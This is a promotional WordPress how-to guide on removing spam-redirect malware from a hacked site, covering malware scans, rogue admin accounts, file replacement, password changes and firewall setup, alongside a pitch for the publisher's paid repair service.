Consider this scenario: When attempting to access your WordPress site, you’re unexpectedly redirected to a questionable gambling platform or a dubious online pharmacy.
The realization that your website has been compromised can be alarming. 😱
We understand the fear and annoyance this situation brings. However, the first step is to remain calm.
Your website is salvageable, and we’re prepared to assist you at each stage of restoration. Whether your audience encounters spam redirects or you’re confronted with the unsettling “This site may be hacked” alert from Google, we can help.
This guide outlines two reliable methods for preventing WordPress from redirecting to spam sites.
Why Is My WordPress Site Redirecting to Spam?
Spam redirects occur when hackers insert harmful code into your WordPress installation. This code reroutes visitors to undesirable websites containing advertisements, phishing attempts, or malware.
Attackers employ various techniques to infiltrate your site, such as:
- Infected Plugins & Themes: Plugins and themes acquired from unofficial sources, often called ‘nulled,’ frequently introduce malware and spam redirects.
- Weak Passwords: Attackers can guess or steal weak admin passwords to take control of your site and insert malicious code that redirects users to spam sites.
- Unpatched Security Holes: Outdated WordPress core files, plugins, or themes expose your site to known vulnerabilities that hackers exploit to introduce malicious code.
- Hidden Backdoors:Even after malware removal, hackers may leave concealed backdoors for future reinfections.
Often, website owners are unaware of a hack until visitors complain or search engines flag the site. Prompt action minimizes damage.
This guide presents two methods. Use the links below to jump to your preferred method:
- Method 1: Use A Hacked Site Repair Service (Recommended 🎯)
- Method 2: Fix WordPress Spam Site Redirects Manually (DIY Users)
- Step 4: Remove Malicious Code from Theme & Plugin Files
- Bonus Tips: Prevent Future WordPress Hacks
Let’s begin with our recommended solution because it is easier for beginners, non-tech users, and small business owners.
Method 1: Use A Hacked Site Repair Service (Recommended 🎯)
When your site is compromised, time is crucial. Each minute of spam redirects can lead to lost visitors, damaged reputation, and potential penalties from Google.
Therefore, many site owners opt for a professional repair service as the quickest and safest recovery method.
The Expert Solution:
For most WordPress users, the easiest way to clean spam redirects is by using our professional Hacked Site Repair Service.
For a single payment, our WordPress security experts will clean your site and eliminate the spam redirect code.
Our Hacked Site Repair Service provides these advantages:
- Expert technicians who have handled thousands of hacked sites
- Emergency response & timely fixes
- Complete malware removal and security hardening
- Post-cleanup backup of your website
- No risk of accidentally damaging your site
The best part is that you get a 30-day guarantee and a full refund if we are unable to fix your WordPress website.
👉 Ready for expert help? Just visit our Hacked Site Repair Service page to get started.
Method 2: Fix WordPress Spam Site Redirects Manually (DIY Users)
If you’re comfortable with WordPress and prefer to handle things yourself, then we’ve created a comprehensive step-by-step guide.
We’ll walk you through each part of the cleanup process, explaining what to do and why it matters.
⚠️ Caution: While DIY fixes are possible, they can be risky if you’re not familiar with WordPress security. One wrong move could make the problem worse or lead to data loss.
ℹ️ Important: Create a Backup Restore Point
Before starting any repairs, make sure you have a recent backup of your site. If something goes wrong, then you’ll want a restoration point.
We recommend using Duplicator, which easily backs up and restores your website. We use it across our business, and it has been a game-changer for our secure backup needs. For more details, check out our complete Duplicator review.
Note: A free version of Duplicator is also available. You can give it a try, but we recommend upgrading to a paid plan, which offers more features.
Now that your website is ready, you can begin removing the spam redirects.
Step 1: Scan Your Website for Malware
Scanning for malware is similar to using a metal detector to locate hidden threats within your site files.
Based on our experience, spam redirects are often concealed in unusual locations, emphasizing the need for a complete scan.
Luckily, there are excellent WordPress security plugins available that you can use to scan your website.
The following steps will help you run a successful malware scan.
First, install a reliable security plugin like Sucuri Security or Wordfence. This article uses Wordfence for demonstration, but the instructions are similar across plugins.
First, you will need to install the security plugin of your choice. For details, see our guide on how to install a WordPress plugin.
Then, go to the Scan area in the plugin menu and start a full site scan. The scan duration depends on the amount of data and files on your site.
The scan results will be displayed when it is finished.
Review the results carefully and look for severe, critical, and other issues. You can click on an issue to view its details.
Most security plugins include instructions for resolving each issue.
WordPress security scanners are often effective at finding common malware and redirect hacks. They might find the spam redirect code.
💡 Pro tip: Don’t rely on just one scanner. Different security tools can catch different types of malware. We recommend using at least two different scanning solutions.
Step 2: Check for Suspicious Admin Users
Hackers often create hidden administrator accounts to maintain access to your site. These accounts might have innocent-looking usernames or be disguised as system accounts.
We’ve seen cases where hackers created a single cleverly disguised admin user account. We have also seen cases where the malware created dozens of admin accounts.
Just follow these steps to identify and remove suspicious users.
Go to the Users » All Users page in your WordPress admin dashboard.
Here, you need to look for accounts you don’t recognize. These could be accounts with random numbers or strange usernames or accounts pretending to be system accounts.
Next, it’s time to remove any suspicious accounts immediately by clicking ‘Delete’ under that account.
⚠️ Warning: Some hackers name their accounts after common WordPress roles like “admin_support” or “wp_maintenance”. Be extra vigilant with system-looking usernames.
Once you have reviewed and deleted suspicious user accounts, you can move on to the next step.
Step 3: Replace Hacked WordPress Files
Just like replacing a virus-infected hard drive with a clean one, we need to restore clean versions of core WordPress files.
Don’t worry – this won’t affect any of your website content, images, themes, or plugins.
Here’s our tested process for safe file replacement.
First, you need to download a fresh copy of WordPress from WordPress.org and unzip the file on your computer.
Next, connect to your site using an FTP client or File Manager app in cPanel and navigate to the WordPress root folder.
This is the folder where you will be able to see the wp-admin, wp-includes, and wp-content folders.
Now, go ahead and delete the existing wp-admin and wp-includes folders.
Once they are deleted, you need to upload the clean versions from your computer.
After replacing the main folders, you need to replace all core files in the root directory. This includes files like wp-activate.php, wp-blog-header.php, wp-comments-post.php, wp-config-sample.php, and more.
When prompted, select ‘Overwrite’ to replace old files with the new version.
Next, you need to download the wp-config.php file to your computer as a backup and delete the .htaccess file from your root folder. Don’t worry because WordPress will automatically regenerate the .htaccess file for you.
Now, you have to rename the wp-config-sample.php file to wp-config.php and then right-click to ‘Edit’ it. The file will open in a text editor like Notepad or TextEdit.
Carefully fill in the values for the database connection. You can see the old Locate the 'wp-config.php' file.Use the ‘wp-config.php’ file that you previously downloaded to identify your WordPress database name, table prefix, username, password, and hostname.
Refer to our guide on editing the wp-config.php file for comprehensive instructions.
After replacing the core files, check both your website and admin dashboard to confirm proper functionality.
With the core files restored, proceed to the next step.
Step 4: Remove Malicious Code from Theme & Plugin Files
A frequent malware vector is through ‘nulled’ plugins and themes – essentially, pirated versions of premium WordPress resources obtained from unverified sources.
Hackers commonly insert malicious code into theme and plugin files, often embedding spam links and redirects within legitimate code to make detection more difficult. We’ll show you what to look for.
⚠️Warning: Most WordPress theme and plugin settings are stored in the database and will remain there even if you delete those files. However, sometimes, you may lose settings or custom changes you made to those files. In that case, you will need to manually restore those changes.
Just follow this process to clean your plugin and theme files.
Begin by downloading new copies of all your themes and plugins from reliable sources. For free resources, the WordPress.org repository is the definitive source. Download premium themes and plugins from their official websites.
After downloading all plugin and theme files, use an FTP client to access your site and open the wp-content folder.
Next, remove the themes and plugins directories from your server. After deleting them, create new directories named ‘themes’ and ‘plugins’, resulting in empty themes and plugins folders on your website.
Now, begin uploading the theme and plugin files you previously downloaded. Remember to unzip each file before uploading it to your site.
After uploading, access your WordPress admin panel in a web browser and activate your theme and plugins. If any errors appear, re-upload the specific theme or plugin file.
Replacing the existing theme and plugin files with freshly downloaded copies from trusted sources will remove any malicious code.
At this point, your website should be free of spam redirects. However, you should enhance your website’s security to ensure continued protection.
Step 6: Securing WordPress After Cleaning Up Spam Redirects
Security is a continuous process, not a one-time task.
Now that the spam redirects are fixed and removed, the next step involves ensuring your website remains secure in the future.
This requires implementing additional security measures to harden your website.
1. Change All Website Passwords
Strong passwords are vital for WordPress security. If a hack is suspected, immediately change all passwords associated with your website.
This involves updating passwords for:
- All user accounts on your WordPress website. See our guide on changing passwords for all users in WordPress.
- All FTP account passwords. You can find and manage these within your hosting control panel.
- The password for your WordPress database user. MySQL users are typically found in the Database section of your hosting control panel. You also need to change the database username password in your
wp-config.phpfile; otherwise, you will encounter the ‘error connecting to database’ message.
💡Pro Tip: Employ strong, unique passwords and consider a password manager such as 1Password for secure storage.
2. Install a Security Plugin and a WordPress Firewall
With the cleanup done, it’s time to improve your site’s defenses against future attacks. Consider this step as implementing a sophisticated security system for your WordPress installation.
Our recommended security configuration is as follows:
- Install a WordPress security plugin like Sucuri or Wordfence (both have excellent free versions).
- Implement a cloud-based WordPress firewall. We suggest using the free Cloudflare CDN, which proactively blocks suspicious activity before it impacts your site.
We use Cloudflare on CanadaCreate. You can read about our experience in our case study on switching to Cloudflare.
For robust WordPress security, use both a WordPress security plugin and a cloud-based firewall. This combination effectively blocks malware, DDoS attacks, and brute-force hacking.
Bonus Tips: Prevent Future WordPress Hacks
Preventing hacks is better than fixing them. We’ve created a reliable prevention strategy based on assisting numerous users with site recovery.
Our WordPress security handbook contains a complete, step-by-step security setup suitable for beginners and small businesses; it’s the same setup we employ on all our sites.
Here are our key security recommendations:
- Set up automated WordPress backups.
- Maintain updated versions of WordPress core, themes, and plugins.
- Set up two-factor authentication in WordPress.
- Limit login attempts to prevent brute force attacks.
These easily implemented tips provide ongoing protection against malicious spam URL redirects.
Final Words: Securing WordPress From Spam Redirects and Malware
Spam redirects are alarming, but you now possess the tools and knowledge to repair your site.
Regardless of whether you select ourHacked Site Repair service (Recommended) or utilize this DIY guide, you’re taking positive action toward securing your WordPress website.
Remember, security is continuous, not a one-time task. The prevention tips shared will enhance your protection against future attacks. 💪
Consider reviewing our guide on identifying legitimate WordPress security emails or securing WordPress multisite installations.
If you liked this article, then please subscribe to our YouTube Channel for WordPress video tutorials. You can also find us on Twitter and Facebook.
